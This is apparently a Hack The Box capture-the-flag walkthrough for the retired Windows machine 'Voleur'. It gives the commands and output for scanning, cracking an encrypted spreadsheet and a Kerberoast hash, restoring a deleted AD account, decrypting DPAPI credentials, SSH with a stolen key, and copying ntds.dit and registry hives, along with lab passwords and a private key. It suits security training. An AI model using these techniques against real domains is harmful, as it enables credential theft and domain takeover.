Voleur Machine Info
OS	Windows
Difficulty	Medium
Status	Retired
Stars	4.8/5.0
Released	2025-07-05
Owns	User: 4,331 Root: 3,680
Times	User: 1H 14M 8S Root: 2H 18M 0S
My Rank	85

Initial Creds

As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account:

ryan.naylor

HollowOct31Nyt

Enum

$ export IP=<IP>
 
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn
 
*snip*
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-07-06 03:05:44Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2222/tcp  open  ssh           syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+vH6cIy1hEFJoRs8wB3O/XIIg4X5gPQ8XIFAiqJYvSE7viX8cyr2UsxRAt0kG2mfbNIYZ+80o9bpXJ/M2Nhv1VRi4jMtc+5boOttHY1CEteMGF6EF6jNIIjVb9F5QiMiNNJea1wRDQ2buXhRoI/KmNMp+EPmBGB7PKZ+hYpZavF0EKKTC8HEHvyYDS4CcYfR0pNwIfaxT57rSCAdcFBcOUxKWOiRBK1Rv8QBwxGBhpfFngayFj8ewOOJHaqct4OQ3JUicetvox6kG8si9r0GRigonJXm0VMi/aFvZpJwF40g7+oG2EVu/sGSR6d6t3ln5PNCgGXw95pgYR4x9fLpn/OwK6tugAjeZMla3Mybmn3dXUc5BKqVNHQCMIS6rlIfHZiF114xVGuD9q89atGxL0uTlBOuBizTaF53Z//yBlKSfvXxW4ShH6F8iE1U8aNY92gUejGclVtFCFszYBC2FvGXivcKWsuSLMny++ZkcE4X7tUBQ+CuqYYK/5TfxmIs=
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
|   256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
60910/tcp open  msrpc         syn-ack Microsoft Windows RPC
60918/tcp open  msrpc         syn-ack Microsoft Windows RPC
60938/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
 
Host script results:
| smb2-time:
|   date: 2025-07-06T03:06:39
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h59m59s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 58352/tcp): CLEAN (Timeout)
|   Check 2 (port 63857/tcp): CLEAN (Timeout)
|   Check 3 (port 52699/udp): CLEAN (Timeout)
|   Check 4 (port 44616/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Update /etc/hosts
Fix Time Skew

$ echo "$IP voleur.htb dc.voleur.htb DC.voleur.htb" | sudo tee -a /etc/hosts
$ sudo ntpdate $IP

Setup /etc/krb5.conf

[libdefaults]
    default_realm = VOLEUR.HTB
    forwardable = true

[realms]
    VOLEUR.HTB = {
        kdc = <IP>
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb  = VOLEUR.HTB

Get ticket with initial creds

$ getTGT.py -dc-ip $IP 'voleur.htb/ryan.naylor:HollowOct31Nyt'
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[*] Saving ticket in ryan.naylor.ccache
 
$ export KRB5CCNAME=ryan.naylor.ccache

SMB enum via kerberos auth

$ nxc smb $IP --use-kcache --shares
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               [*] Enumerated shares
SMB         10.129.27.164   445    DC               Share           Permissions     Remark
SMB         10.129.27.164   445    DC               -----           -----------     ------
SMB         10.129.27.164   445    DC               ADMIN$                          Remote Admin
SMB         10.129.27.164   445    DC               C$                              Default share
SMB         10.129.27.164   445    DC               Finance
SMB         10.129.27.164   445    DC               HR
SMB         10.129.27.164   445    DC               IPC$            READ            Remote IPC
SMB         10.129.27.164   445    DC               IT              READ
SMB         10.129.27.164   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.27.164   445    DC               SYSVOL          READ            Logon server share
 
$ nxc smb enum $IP --use-kcache --share IT --dir ""
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               Perms    File Size      Date                          File Path
SMB         10.129.27.164   445    DC               -----    ---------      ----                          ---------
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:10:01 2025      .
SMB         10.129.27.164   445    DC               dr--     0              Mon Jun 30 17:08:33 2025      ..
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:40:17 2025      First-Line Support
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
 
$ nxc smb enum $IP --use-kcache --share IT --dir "First-Line Support"
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               Perms    File Size      Date                          File Path
SMB         10.129.27.164   445    DC               -----    ---------      ----                          ---------
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:40:17 2025      First-Line Support\.
SMB         10.129.27.164   445    DC               dr--     0              Wed Jan 29 04:10:01 2025      First-Line Support\..
SMB         10.129.27.164   445    DC               fr--     16896          Thu May 29 18:23:36 2025      First-Line Support\Access_Review.xlsx
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
 
$ nxc smb $IP --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT
SMB         10.129.27.164   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.27.164   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         10.129.27.164   445    DC               [*] Copying "First-Line Support/Access_Review.xlsx" to "./Access_Review.xlsx"
SMB         10.129.27.164   445    DC               [+] File "First-Line Support/Access_Review.xlsx" was downloaded to "./Access_Review.xlsx"

User

File information
Crack xlsx hash with john

$ file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted
 
$ /usr/share/john/office2john.py Access_Review.xlsx > excel.hash
 
$ john --wordlist=/usr/share/wordlists/rockyou.txt excel.hash
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)

XLSX

football1

Open in libreoffice or office with password

Account	Role	Group	Notes
Ryan.Naylor	First-Line Support Technician	SMB	Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant	First-Line Support Technician	SMB
Lacey.Miller	Second-Line Support Technician	Remote Management Users
Todd.Wolfe	Second-Line Support Technician	Remote Management Users	Leaver. Password reset to `NightT1meP1dg3on14` and account deleted.
Jeremy.Combs	Third-Line Support Technician	Remote Management Users	Has access to Software folder.
Administrator	Administrator	Domain Admin	Not to be used for daily tasks!

Service Account	Purpose	Credentials / Notes
svc_backup	Windows Backup	Speak to Jeremy!
svc_ldap	LDAP Services	P/W – `M1XyC9pW7qT5Vn`
svc_iis	IIS Administration	P/W – `N5pXyW1VqM7CZ8`
svc_winrm	Remote Management	Ask Lacey – she just reset it.

Creds

Todd.Wolfe : NightT1meP1dg3on14

svc_ldap : M1XyC9pW7qT5Vn

svc_iis : N5pXyW1VqM7CZ8

Todd is deleted so we search accordingly using svc_ldap credentials
Cannot restore yet with current users

$ ldapsearch -x -H ldap://$IP \
  -D "svc_ldap@voleur.htb" -w 'M1XyC9pW7qT5Vn' \
  -b "dc=voleur,dc=htb" \
  -s sub \
  -E '!1.2.840.113556.1.4.417' \
  "(isDeleted=TRUE)"
 
# extended LDIF
#
# LDAPv3
# base <dc=voleur,dc=htb> with scope subtree
# filter: (isDeleted=TRUE)
# requesting: ALL
#
 
# Deleted Objects, voleur.htb
dn: CN=Deleted Objects,DC=voleur,DC=htb
objectClass: top
objectClass: container
cn: Deleted Objects
description: Default container for deleted objects
distinguishedName: CN=Deleted Objects,DC=voleur,DC=htb
instanceType: 4
whenCreated: 20250129084227.0Z
whenChanged: 20250129124442.0Z
uSNCreated: 5659
isDeleted: TRUE
uSNChanged: 13005
showInAdvancedViewOnly: TRUE
name: Deleted Objects
objectGUID:: tNh8WGpv2UaL1I+zHS4Y2A==
systemFlags: -1946157056
objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=voleur,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 16010101000000.0Z
 
# Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db, Deleted Objects, voleur.
 htb
dn: CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Object
 s,DC=voleur,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn:: VG9kZCBXb2xmZQpERUw6MWM2YjFkZWItYzM3Mi00Y2JiLTg3YjEtMTUwMzFkZTE2OWRi
sn: Wolfe
description: Second-Line Support Technician
givenName: Todd
distinguishedName: CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN
 =Deleted Objects,DC=voleur,DC=htb
instanceType: 4
whenCreated: 20250129090806.0Z
whenChanged: 20250706095139.0Z
displayName: Todd Wolfe
uSNCreated: 12863
isDeleted: TRUE
uSNChanged: 131227
name:: VG9kZCBXb2xmZQpERUw6MWM2YjFkZWItYzM3Mi00Y2JiLTg3YjEtMTUwMzFkZTE2OWRi
objectGUID:: 6x1rHHLDu0yHsRUDHeFp2w==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 133962686506585744
pwdLastSet: 133826280731790960
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAA+eMb6mZhtk8nnM2lVgQAAA==
accountExpires: 9223372036854775807
logonCount: 13
sAMAccountName: todd.wolfe
userPrincipalName: todd.wolfe@voleur.htb
lastKnownParent: OU=Second-Line Support Technicians,DC=voleur,DC=htb
dSCorePropagationData: 20250706094137.0Z
dSCorePropagationData: 20250706080448.0Z
dSCorePropagationData: 20250706074204.0Z
dSCorePropagationData: 20250513231110.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 133962613904629910
msDS-LastKnownRDN: Todd Wolfe
 
# search reference
ref: ldap://ForestDnsZones.voleur.htb/DC=ForestDnsZones,DC=voleur,DC=htb
 
# search reference
ref: ldap://DomainDnsZones.voleur.htb/DC=DomainDnsZones,DC=voleur,DC=htb
 
# search reference
ref: ldap://voleur.htb/CN=Configuration,DC=voleur,DC=htb
 
# search result
search: 2
result: 0 Success
 
# numResponses: 6
# numEntries: 2
# numReferences: 3

Get ticket as svc_ldap
Targeted Kerberoast on svc_winrm since it does not have SPN

$ getTGT.py -dc-ip $IP 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Saving ticket in svc_ldap.ccache
 
$ export KRB5CCNAME=svc_ldap.ccache
 
$ python3 targetedKerberoast.py -v -d voleur.htb -u svc_ldap -k --no-pass --dc-ip $IP --dc-host dc.voleur.htb --request-user svc_winrm -o svc_winrm.hash
[*] Starting kerberoast attacks
[*] Attacking user (svc_winrm)
[VERBOSE] SPN added successfully for (svc_winrm)
[+] Writing hash to file for (svc_winrm)
[VERBOSE] SPN removed successfully for (svc_winrm)
 
$ cat svc_winrm.hash
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$608cee01816bf1b974d651360541b9e2$1ea236772334e22dd6edd25305f1e744e9bb422a933285791a5e722e9aeec0487288558c704c1a5eb0680a5841b7561b16152605989b0d96f626b5e3bc5cc4e69d2724c0518348a9751bdd5aa76e1f9720895048f7de8fefe04898d677898e64d325defe67fe9388d464c5561edb45d65986a28123ce60ff6f291203d92fb77048baea1493e03f04c6431498c4ccb8591b916cd962ae3aea8b1a195b40ff6c241d305ffb29b31c806c89fc033c87f714ed2279157a2016c93dfa08de5188ac4b57e4c558748967f0e258e0dc118311291ee05616205e3e4d734f2add0248ac7ce8fd9c1458e1245382c9dcdc5c5d7f1da0fbdf72f9a3f274beb9ed06b4c35835f30bf2b35a54c3ba677f213d853f3854a1dbf02bf6ecf09632bf886e2065ae1c526506ce6b4c74d313c502102869ea6732908c76e6818329fa4966dea59cb309c016a49eaf2897e0b171bb3e53a4373fa5a9ed95d4cc5137fd4b73b7e2a9e8e8059a469382e4bdee92c3716e6f6e2d4cec80e5197f1dc75b2ffcc2125c3654d76fb09437b9aec5de11a32cd23feaec589cc52e1917f9ac386155be3a15898fbdbf1ca822c3d5fcb611b8414a70048cff0910e9952f389146aed1a92ea38db232d9469249abf21701bfcf624a1c456641ba1429e043cb2f62b9ef036c8182efdd0790b8d7c31cad52d25cf54b2484f404763378f864286416f69e1799fc5919d6452953409b66d91aaaf54173d08a92fa1ecb6bb709c9e888a47e45a1f1372950bd8f0c2ef6b540e9490cdb3a87b231d53569fa4fa07d18452368ecc1dbfc950e7f4a649c0cdfcee91181f3d781bf4e68f2b2b9295ea9afbedc242306447aaca72e584fffcc1318550948ab9feff462aca4f4dc210b5d88d0462680aa9e0f2641090ed5dc6f3407472136fd7237bcc31b4c1109ccf0c20c0cca0bb3bfb1ef059eba2010be2769ac4c6cdc6af1a61b600c3ce65ce3726455d54e29333d3defe9fd25ee6d67913f0869df94afb8c43718b50591ad26c57cf5008b1950315e60261f68f709c85af31aed5a55d2f51238dc8c11817f384c683e36409b49f705f01cad32767d96a7b5bfadf5f801989d021f0a5bbb5dd0e14dd00c44f5fc5fa6ab2db87ca91380f032971855af251bb764db95555f0e2b47f086f602b9dc809a3d7a06df00ad8c3feb154fb92d29b309c136dfdc9221a97b821c9912fc14d6cb07adba94e6bbf3a9b6f214f9767e450328cc1a0f5fa6ed2629f6343b03ccbe648980eeafdfe301aa9b8c900765341106932cad6199ec076ba5ab8c19a7f3386b6b66f290ffe7e419112459b4b462718887a29cf84049a5d49fd99ba3bdb808ab69b2af5cf39e0720911a0341a18a07d16dae7fb0f92045cc75cfe334e9b98c148aeca56e480d42671434746e892eb6c7254d3a9a1f3886f5e487eec21a5d23ca70270f119da49739a8ccf2a9a21d101ba4beb57ba52e

Crack Hash

$ hashcat -m 13100 svc_winrm.hash /usr/share/wordlists/rockyou.txt
*snip*
AFireInsidedeOzarctica980219afi

Creds

svc_winrm

AFireInsidedeOzarctica980219afi

Auth as svc_winrm and connect

$ kdestroy
 
$ echo 'AFireInsidedeOzarctica980219afi' | kinit svc_winrm@VOLEUR.HTB
 
$ evil-winrm -i DC.voleur.htb -r voleur.htb
 
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> dir ../Desktop
 
 
    Directory: C:\Users\svc_winrm\Desktop
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  12:40 AM             34 user.txt

Root

Recall deleted Todd.Wolfe

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> Get-ADUser todd.wolfe
 
Cannot find an object with identity: 'todd.wolfe' under: 'DC=voleur,DC=htb'.
At line:1 char:1
+ Get-ADUser todd.wolfe
+ ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (todd.wolfe:ADUser) [Get-ADUser], ADIdentityNotFoundException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException,Microsoft.ActiveDirectory.Management.Commands.GetADUser

Use svc_ldap creds to restore deleted object

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> $secpass = ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("svc_ldap@voleur.htb",$secpass)
Import-Module ActiveDirectory; Get-ADObject `
  -Filter "sAMAccountName -eq 'todd.wolfe'" `
  -IncludeDeletedObjects `
  -Credential $cred `
| Restore-ADObject -Credential $cred

Check again

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> Get-ADUser todd.wolfe
 
 
DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
Enabled           : True
GivenName         : Todd
Name              : Todd Wolfe
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db
SamAccountName    : todd.wolfe
SID               : S-1-5-21-3927696377-1337352550-2781715495-1110
Surname           : Wolfe
UserPrincipalName : todd.wolfe@voleur.htb

Auth as Todd
Access IT share on smb

$ kdestroy
 
$ echo 'NightT1meP1dg3on14' | kinit todd.wolfe@VOLEUR.HTB
 
$ smbclient -k //dc.voleur.htb/IT
 
smb: \> ls
  .                                   D        0  Wed Jan 29 04:10:01 2025
  ..                                DHS        0  Mon Jun 30 17:08:33 2025
  Second-Line Support                 D        0  Wed Jan 29 10:13:03 2025
 
		5311743 blocks of size 4096. 881170 blocks available

File enum reveals DPAPI credentials
Grab blobs and decrypt locally

$ smbget -k "smb://dc.voleur.htb/IT/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88"
 
$ smbget -k "smb://dc.voleur.htb/IT/Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3"
 
$ dpapi.py masterkey \
  -file 08949382-134f-4c63-b93c-ce52efc0aa88 \
  -sid S-1-5-21-3927696377-1337352550-2781715495-1110 \
  -password 'NightT1meP1dg3on14'
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
 
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
 
$ dpapi.py credential \
  -file 772275FAD58525253490A9B0039791D3 \
  -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description :
Unknown     :
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

Creds

jeremy.combs

qT3V9pLXyN7W4m

Auth again as jeremy.combs

 
$ kdestroy
 
$ echo 'qT3V9pLXyN7W4m' | kinit jeremy.combs@VOLEUR.HTB
 
$ smbclient -k //dc.voleur.htb/IT
 
smb: \> recurse ON
 
smb: \> ls
  .                                   D        0  Wed Jan 29 04:10:01 2025
  ..                                DHS        0  Mon Jun 30 17:08:33 2025
  Third-Line Support                  D        0  Thu Jan 30 11:11:29 2025
 
\Third-Line Support
  .                                   D        0  Thu Jan 30 11:11:29 2025
  ..                                  D        0  Wed Jan 29 04:10:01 2025
  id_rsa                              A     2602  Thu Jan 30 11:10:54 2025
  Note.txt.txt                        A      186  Thu Jan 30 11:07:35 2025
 
 
smb: \>  mget "Third-Line Support\"
Get directory Backups? y
Get file id_rsa? y
getting file \Third-Line Support\id_rsa of size 2602 as Third-Line Support/id_rsa (1.1 KiloBytes/sec) (average 3.3 KiloBytes/sec)
Get file Note.txt.txt? y
getting file \Third-Line Support\Note.txt.txt of size 186 as Third-Line Support/Note.txt.txt (0.4 KiloBytes/sec) (average 3.0 KiloBytes/sec)
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \Third-Line Support\Backups\*

Inspect Files
/Backup is empty - Maybe we lack access for now…

$ cat Note.txt.txt
Jeremy,
 
I`ve had enough of Windows Backup! I`ve part configured WSL to see if we can utilize any of the backup tools from Linux.
 
Please see what you can set up.
 
Thanks,
 
Admin
 
$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7
rVMq+X6NJnb2v5pCzpoyobONWorBXMKV9DnbQumWxYXKQyr6vgSrLd3JBW6TNZa3PWThy9
wrTROegdYaqCjzk3Pscct66PhmQPyWkeVbIGZAqEC/edfONzmZjMbn7duJwIL5c68MMuCi
9u91MA5FAignNtgvvYVhq/pLkhcKkh1eiR01TyUmeHVJhBQLwVzcHNdVk+GO+NzhyROqux
haaVjcO8L3KMPYNUZl/c4ov80IG04hAvAQIGyNvAPuEXGnLEiKRcNg+mvI6/sLIcU5oQkP
JM7XFlejSKHfgJcP1W3MMDAYKpkAuZTJwSP9ISVVlj4R/lfW18tKiiXuygOGudm3AbY65C
lOwP+sY7+rXOTA2nJ3qE0J8gGEiS8DFzPOF80OLrAAAFiIygOJSMoDiUAAAAB3NzaC1yc2
EAAAGBAKhcjzL1EVv6m8kZXpgDM2j1b30eyTR85y+sQxz+KP4aliM593Weuj9mm7DIGctl
1xn9qTtDNd1InYgWhd3SzS+2NUnkvwzIrBONdcx8egEDHqY9DBgYv3NVH4u61TKvl+jSZ2
9r+aQs6aMqGzjVqKwVzClfQ520LplsWFykMq+r4Eqy3dyQVukzWWtz1k4cvcK00TnoHWGq
go85Nz7HHLeuj4ZkD8lpHlWyBmQKhAv3nXzjc5mYzG5+3bicCC+XOvDDLgovbvdTAORQIo
JzbYL72FYav6S5IXCpIdXokdNU8lJnh1SYQUC8Fc3BzXVZPhjvjc4ckTqrsYWmlY3DvC9y
jD2DVGZf3OKL/NCBtOIQLwECBsjbwD7hFxpyxIikXDYPpryOv7CyHFOaEJDyTO1xZXo0ih
34CXD9VtzDAwGCqZALmUycEj/SElVZY+Ef5X1tfLSool7soDhrnZtwG2OuQpTsD/rGO/q1
zkwNpyd6hNCfIBhIkvAxczzhfNDi6wAAAAMBAAEAAAGBAIrVgPSZaI47s5l6hSm/gfZsZl
p8N5lD4nTKjbFr2SvpiqNT2r8wfA9qMrrt12+F9IInThVjkBiBF/6v7AYHHlLY40qjCfSl
ylh5T4mnoAgTpYOaVc3NIpsdt9zG3aZlbFR+pPMZzAvZSXTWdQpCDkyR0QDQ4PY8Li0wTh
FfCbkZd+TBaPjIQhMd2AAmzrMtOkJET0B8KzZtoCoxGWB4WzMRDKPbAbWqLGyoWGLI1Sj1
MPZareocOYBot7fTW2C7SHXtPFP9+kagVskAvaiy5Rmv2qRfu9Lcj2TfCVXdXbYyxTwoJF
ioxGl+PfiieZ6F8v4ftWDwfC+Pw2sD8ICK/yrnreGFNxdPymck+S8wPmxjWC/p0GEhilK7
wkr17GgC30VyLnOuzbpq1tDKrCf8VA4aZYBIh3wPfWFEqhlCvmr4sAZI7B+7eBA9jTLyxq
3IQpexpU8BSz8CAzyvhpxkyPXsnJtUQ8OWph1ltb9aJCaxWmc1r3h6B4VMjGILMdI/KQAA
AMASKeZiz81mJvrf2C5QgURU4KklHfgkSI4p8NTyj0WGAOEqPeAbdvj8wjksfrMC004Mfa
b/J+gba1MVc7v8RBtKHWjcFe1qSNSW2XqkQwxKb50QD17TlZUaOJF2ZSJi/xwDzX+VX9r+
vfaTqmk6rQJl+c3sh+nITKBN0u7Fr/ur0/FQYQASJaCGQZvdbw8Fup4BGPtxqFKETDKC09
41/zTd5viNX38LVig6SXhTYDDL3eyT5DE6SwSKleTPF+GsJLgAAADBANMs31CMRrE1ECBZ
sP+4rqgJ/GQn4ID8XIOG2zti2pVJ0dx7I9nzp7NFSrE80Rv8vH8Ox36th/X0jme1AC7jtR
B+3NLjpnGA5AqcPklI/lp6kSzEigvBl4nOz07fj3KchOGCRP3kpC5fHqXe24m3k2k9Sr+E
a29s98/18SfcbIOHWS4AUpHCNiNskDHXewjRJxEoE/CjuNnrVIjzWDTwTbzqQV+FOKOXoV
B9NzMi0MiCLy/HJ4dwwtce3sssxUk7pQAAAMEAzBk3mSKy7UWuhHExrsL/jzqxd7bVmLXU
EEju52GNEQL1TW4UZXVtwhHYrb0Vnu0AE+r/16o0gKScaa+lrEeQqzIARVflt7ZpJdpl3Z
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

SSH in using id_rsa (recall svc_backup account)
Port 2222 from initial scans

$ chmod 600 id_rsa
 
$ ssh -i id_rsa svc_backup@$IP -p 2222

View /Backup we could not see before

svc_backup@DC ~ sudo ls -la /mnt/c/IT/Third-Line\ Support/Backups/
 
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11  .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11  ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49  registry
 
svc_backup@DC ~ sudo ls -la /mnt/c/IT/Third-Line\ Support/Backups/'Active Directory'
 
total 24592
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 03:49 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup    16384 Jan 30 03:49 ntds.jfm
 
svc_backup@DC ~ sudo ls -la /mnt/c/IT/Third-Line\ Support/Backups/registry/
 
total 17952
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup     4096 Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup    32768 Jan 30 03:30 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 03:30 SYSTEM

NTDS Dump to local machine

cp "/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" /home/svc_backup/
cp "/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" /home/svc_backup/
cp "/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" /home/svc_backup/
tar -czf dpapi_files.tar.gz ntds.dit SYSTEM SECURITY
 
# Local machine
